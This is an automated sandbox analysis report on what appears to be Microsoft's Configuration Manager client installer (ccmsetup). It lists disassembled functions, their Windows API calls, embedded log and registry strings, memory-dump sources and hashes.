                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$42k$CcmGetCertificateContextEx2( sStoreName, sCertIssuers, sCertSel, (BOOL)dwCertFirstFlag, dwCertFlags, &g_pClientCertContext )$CcmSetup::GetSSLCertificateContext$GetSSLCertificateContext failed with error 0x%x$Last cert queries failed. Will retry after %u seconds.$Locate client certificate bypassing Certificate Issuers restriction$SSLCertificateContext: CertStore=%s, CertIssuers=%s, CertificateSelectionCriteria=%s, FirstCertificateSelection=%d, PKICertOptions$ccmsetup.cpp$ccmsetup.cpp$t&k
                                                                                          • API String ID: 3654290402-3873082328
                                                                                          • Opcode ID: e7f860bf4723f46cc4715965cf3bbe90a263eb83266428116fa6899d5226e79a
                                                                                          • Instruction ID: 3e8fe473b4a66841a0cff05b4e3d569a8d125a34ee4753cdfa5c2963d058f500
                                                                                          • Opcode Fuzzy Hash: e7f860bf4723f46cc4715965cf3bbe90a263eb83266428116fa6899d5226e79a
                                                                                          • Instruction Fuzzy Hash: EDB1BEB1D00219EAEF11EBA4CD5AAEEBFB9BF55300F144059F805B7292DB345A08DB60
                                                                                          Function 0065431B Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 171networkthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00654325
                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 00654384
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000001D,00000000,00000000), ref: 006543B7
                                                                                          • inet_addr.WS2_32(?), ref: 006543DF
                                                                                          • GetNameInfoW.WS2_32(?,00000010,?,00000401,00000000,00000000,00000004), ref: 00654406
                                                                                          • WSAGetLastError.WS2_32 ref: 00654410
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00654449
                                                                                          • WSACleanup.WS2_32 ref: 006545AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharCleanupCurrentErrorH_prolog3_catch_InfoLastMultiNameStartupThreadWideinet_addr
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\lswins.cpp$..\lswins.cpp$0 == iFailed$CCM::LocationServices::LSResolveAddressToName$IP %ls resolved to %ls$Resolved name %ls is not FQDN
                                                                                          • API String ID: 3604615128-2881486682
                                                                                          • Opcode ID: e3d3148d4d72d0267e96b045ef2d30ea96cf3917ecf9f9f28c9b2a90af2d6469
                                                                                          • Instruction ID: 65b5fb997a11860acb21518db6676c9c4ab3c54c89e549e9ec100e470619ec58
                                                                                          • Opcode Fuzzy Hash: e3d3148d4d72d0267e96b045ef2d30ea96cf3917ecf9f9f28c9b2a90af2d6469
                                                                                          • Instruction Fuzzy Hash: 2A61C670A44259AAEB20EB64CC49BE97BB9FF51705F0081D9F648E61C1EF744A88CF61
                                                                                          Function 00580272 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 138threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00580439
                                                                                            • Part of subcall function 005A162C: __EH_prolog3_GS.LIBCMT ref: 005A1633
                                                                                            • Part of subcall function 005A162C: lstrcmpiW.KERNEL32(?,CCMHTTPPORT,00000001,00000000,?,?,00000001,?), ref: 005A176B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00580301
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_lstrcmpi
                                                                                          • String ID: "$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$&$($AADCLIENTAPPID$AADRESOURCEURI$CCM::LocationServices::CcmGetCMGMetaData( sSiteCode.c_str(), sCMGMP, arrCMGMPs, sTRK)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$g_pSetupEnv->UpdateExecEnv()
                                                                                          • API String ID: 436525598-4159668841
                                                                                          • Opcode ID: ae3767994971a8a108c304283586bfade50b5e4776396b4df6c63e33aef0a6d8
                                                                                          • Instruction ID: ab0c30b14a4e954bf85bd266151111bb5dea97eef1a5bd196a43080aa61670b2
                                                                                          • Opcode Fuzzy Hash: ae3767994971a8a108c304283586bfade50b5e4776396b4df6c63e33aef0a6d8
                                                                                          • Instruction Fuzzy Hash: E851717190529CEEDB10EBA4DE4AFEEBBB9AF91308F1440C9B44577182C6B41F48DB21
                                                                                          Function 0057C24D Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 130threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0057C254
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057C300
                                                                                            • Part of subcall function 005F6BC9: __EH_prolog3_catch.LIBCMT ref: 005F6BD0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057C3A0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Access to registry key '%s' failed with error (0x%08x).$Access to registry value '%s' in key '%s' failed with error (0x%08x).$CcmSetup::CheckPrereqInstalledKey$Software\Microsoft\CCMSetup\Prerequisites$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$hrRes$hrRes
                                                                                          • API String ID: 2170986407-4066963761
                                                                                          • Opcode ID: 6d6087aff8793d2b56fe7c5fce48ca636a65d995e8b12146c029afb1147b8a20
                                                                                          • Instruction ID: 721e037f756a54f5815e05dad710d1af74e22d99ea692e8b2da6ad35e97cd2e3
                                                                                          • Opcode Fuzzy Hash: 6d6087aff8793d2b56fe7c5fce48ca636a65d995e8b12146c029afb1147b8a20
                                                                                          • Instruction Fuzzy Hash: BE41E571D80209EADB00FBE4D94ABED7E75BF52704F248409F5047B282D7B44E09DBA0
                                                                                          Function 0064035A Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 124threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00640361
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006403B7
                                                                                            • Part of subcall function 005F4E46: __EH_prolog3_catch.LIBCMT ref: 005F4E4D
                                                                                            • Part of subcall function 005F4E46: GetCurrentThreadId.KERNEL32 ref: 005F4EB2
                                                                                            • Part of subcall function 005F4E46: __CxxThrowException@8.LIBCMT ref: 005F4F8F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00640449
                                                                                          • IsTextUnicode.ADVAPI32(00000002,?,00000000), ref: 00640472
                                                                                          Strings
                                                                                          • CCM::LocationServices::GetDwordFromColumn, xrefs: 00640374
                                                                                          • ..\lsad.cpp, xrefs: 00640451
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00640444
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006403B2
                                                                                          • GetDwordFromColumn received unexpected column type, xrefs: 00640412
                                                                                          • pCol, xrefs: 006403AD
                                                                                          • mSSMSMPName, xrefs: 006404C6
                                                                                          • ..\lsad.cpp, xrefs: 006403A7
                                                                                          • ..\lsad.cpp, xrefs: 00640439
                                                                                          • AD query returned ADSTYPE_PROV_SPECIFIC for a DWORD type. Value is %s, xrefs: 006404C7
                                                                                          • ..\lsad.cpp, xrefs: 006403BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3_catchH_prolog3_catch_TextThrowUnicode
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$AD query returned ADSTYPE_PROV_SPECIFIC for a DWORD type. Value is %s$CCM::LocationServices::GetDwordFromColumn$GetDwordFromColumn received unexpected column type$mSSMSMPName$pCol
                                                                                          • API String ID: 3700165810-47218295
                                                                                          • Opcode ID: cc64d8075da74adb0be42091f62e9a131652889eeffd6f9fe18d53eba19769c1
                                                                                          • Instruction ID: 06f6de695634b7979f72d07896364e1cdf6254397d7cf7905717b79db3910d5c
                                                                                          • Opcode Fuzzy Hash: cc64d8075da74adb0be42091f62e9a131652889eeffd6f9fe18d53eba19769c1
                                                                                          • Instruction Fuzzy Hash: BC41B371944219EBEB11EFA4C84ABEDBFB5FF84710F148054F614A7392C7785905CBA1
                                                                                          Function 00586007 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 117threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0058600E
                                                                                            • Part of subcall function 0059D6C5: __EH_prolog3_catch_GS.LIBCMT ref: 0059D6CC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058606A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005860E9
                                                                                          Strings
                                                                                          • OSD::Utility::SetupAPIUtil::ExtractFileFromCAB( sCabFile.c_str(), c_szCcmsetupManifestFileName, sManifestFile.c_str() ), xrefs: 005860DF
                                                                                          • ccmsetup.xml, xrefs: 005860B3
                                                                                          • CcmSetup::ExtractManifestCAB, xrefs: 00586019
                                                                                          • ccmsetup.cpp, xrefs: 005860F1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005860E4
                                                                                          • Successfully extracted manifest file %s from file %s., xrefs: 0058616B
                                                                                          • ValidateFileSignature( sCabFile ), xrefs: 00586060
                                                                                          • Failed extract manifest file from cab file '%s'. Error 0x%x. File may be corrupt., xrefs: 0058611B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586065
                                                                                          • ccmsetup.cpp, xrefs: 00586072
                                                                                          • ccmsetup.cpp, xrefs: 0058605A
                                                                                          • ccmsetup.cpp, xrefs: 005860D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::ExtractManifestCAB$Failed extract manifest file from cab file '%s'. Error 0x%x. File may be corrupt.$OSD::Utility::SetupAPIUtil::ExtractFileFromCAB( sCabFile.c_str(), c_szCcmsetupManifestFileName, sManifestFile.c_str() )$Successfully extracted manifest file %s from file %s.$ValidateFileSignature( sCabFile )$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.xml
                                                                                          • API String ID: 3531467662-1084108064
                                                                                          • Opcode ID: 87a26b253f6ed93f0196c859987af8ebe00392d8341d3272fb72cc8e1c1be659
                                                                                          • Instruction ID: 397a04de17276054c892e4979314006298526339d1dab2c70630246222cc331f
                                                                                          • Opcode Fuzzy Hash: 87a26b253f6ed93f0196c859987af8ebe00392d8341d3272fb72cc8e1c1be659
                                                                                          • Instruction Fuzzy Hash: 4A4191B0A41259EBEF10EF94898EBAE7E76BF41754F140008F9047B283C7759A45C7A5
                                                                                          Function 005BB0DA Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 146threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005BB0E1
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB171
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB27A
                                                                                          Strings
                                                                                          • util.cpp, xrefs: 005BB26A
                                                                                          • util.cpp, xrefs: 005BB282
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005BB16C
                                                                                          • regKey.SetMultiString(c_szRegValue_InstalledLangs, sToWrite), xrefs: 005BB270
                                                                                          • SetInstalledLanguages, xrefs: 005BB10F
                                                                                          • Software\Microsoft\CCMSetup, xrefs: 005BB134
                                                                                          • util.cpp, xrefs: 005BB161
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005BB275
                                                                                          • InstalledLangs, xrefs: 005BB23E
                                                                                          • regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess ), xrefs: 005BB167
                                                                                          • util.cpp, xrefs: 005BB179
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CloseH_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$InstalledLangs$SetInstalledLanguages$Software\Microsoft\CCMSetup$regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess )$regKey.SetMultiString(c_szRegValue_InstalledLangs, sToWrite)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 2387487575-1854072094
                                                                                          • Opcode ID: dc3c69a00cfc730de765609a28581cde145d960a73048b1a4e9ba13c04876087
                                                                                          • Instruction ID: bc918c78e538edc60b29c505dad3c5218c8669823ed6f897028a81c32c0f5288
                                                                                          • Opcode Fuzzy Hash: dc3c69a00cfc730de765609a28581cde145d960a73048b1a4e9ba13c04876087
                                                                                          • Instruction Fuzzy Hash: E651D071C45258EADB20EBE4CD1ABEEBF79BF65700F244059F5407B282C7B42A05CBA1
                                                                                          Function 005B6319 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 128threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B6320
                                                                                            • Part of subcall function 00601361: CoTaskMemFree.OLE32(?,?,00600C22,00000000,0063DDEA,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 0060136F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B63BC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6426
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeH_prolog3_catchTask
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$BG error context is %d$GetBITSJobError$d(m$spCopyError->GetError(&bgContext, &hrError)$spCopyJob->GetError(&spCopyError)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 2630231384-1159171810
                                                                                          • Opcode ID: 88ebc1c85b73f420010758ba714c53ecd14ac0ad6d9dd0f3b66e833b7a22ab50
                                                                                          • Instruction ID: c5b1484e53198333f1afd80eb789eb9b1f63486bbb79486ab2441a933e300da4
                                                                                          • Opcode Fuzzy Hash: 88ebc1c85b73f420010758ba714c53ecd14ac0ad6d9dd0f3b66e833b7a22ab50
                                                                                          • Instruction Fuzzy Hash: 29413970D4030AABDB05EFA4C899AEEBFB5BF59310F144059E90577382C6786A05CB61
                                                                                          Function 006733CD Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 110threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006733D4
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                            • Part of subcall function 00673557: __EH_prolog3_catch_GS.LIBCMT ref: 0067355E
                                                                                            • Part of subcall function 00673557: GetCurrentThreadId.KERNEL32 ref: 006735C2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00673464
                                                                                          • SysFreeString.OLEAUT32(?), ref: 0067349D
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006734A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006734E8
                                                                                          Strings
                                                                                          • ..\CheckAccess.cpp, xrefs: 006734D8
                                                                                          • ..\CheckAccess.cpp, xrefs: 00673454
                                                                                          • spSite->GetSslCtlInfo(&bsSslCtlIdentifier, &bsSslCtlStoreName, &dwCertCheckMode), xrefs: 006734DE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006734E3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067345F
                                                                                          • GetMPWebSite(spSite), xrefs: 0067345A
                                                                                          • ..\CheckAccess.cpp, xrefs: 0067346C
                                                                                          • ..\CheckAccess.cpp, xrefs: 006734F0
                                                                                          • CCM::Utility::Security::GetIISSCertCheckMode, xrefs: 00673413
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeString$H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CheckAccess.cpp$..\CheckAccess.cpp$..\CheckAccess.cpp$..\CheckAccess.cpp$CCM::Utility::Security::GetIISSCertCheckMode$GetMPWebSite(spSite)$spSite->GetSslCtlInfo(&bsSslCtlIdentifier, &bsSslCtlStoreName, &dwCertCheckMode)
                                                                                          • API String ID: 4028414696-4290402953
                                                                                          • Opcode ID: 7668c00d9119c2206427d559c406e5bfc6e7c3e7f8e74c4dc32f16e1332d1d03
                                                                                          • Instruction ID: 7c07ea704faf08ab9a834d56202ddef0cbb0045379908830fcde103602b5b684
                                                                                          • Opcode Fuzzy Hash: 7668c00d9119c2206427d559c406e5bfc6e7c3e7f8e74c4dc32f16e1332d1d03
                                                                                          • Instruction Fuzzy Hash: D341D071841268EADF01EBE4C90ABEEBFB5AF15710F14804AF544BB381D7784B05DBA1
                                                                                          Function 005BB2DD Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 83threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005BB2E4
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB35D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB3C2
                                                                                          Strings
                                                                                          • util.cpp, xrefs: 005BB3CA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005BB358
                                                                                          • util.cpp, xrefs: 005BB365
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess), xrefs: 005BB353
                                                                                          • regKey.SetDword(c_szRegValue_Installing, bInstalling ? 1 : 0), xrefs: 005BB3B8
                                                                                          • SetInstallingFlag, xrefs: 005BB300
                                                                                          • Software\Microsoft\CCMSetup, xrefs: 005BB326
                                                                                          • util.cpp, xrefs: 005BB34D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005BB3BD
                                                                                          • util.cpp, xrefs: 005BB3B2
                                                                                          • CcmInstallingProduct, xrefs: 005BB390
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
